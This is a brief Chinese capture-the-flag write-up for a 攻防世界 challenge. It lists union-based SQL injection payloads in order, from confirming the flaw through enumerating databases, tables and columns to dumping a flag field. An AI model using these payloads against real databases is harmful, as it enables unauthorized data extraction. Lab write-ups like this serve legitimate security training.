sql注入笔记
攻防世界
首先拿到题目,首先试下sql注入.居然是sql注入的题目..
确定注入
hello' or '1'='1'#
确定回显位
hello' union select 1,2,3 #
获取全部数据库名
hello' union select 1,2,schema_name from information_schema.schemata #
获取全部表名
hello' union select 1,2,table_name from information_schema.tables #
获取字段名
hello' union select 1,2,column_name from information_schema.columns where table_name='secret_table' #
获取字段值
hello' union select 1,2,fl4g from secret_table #
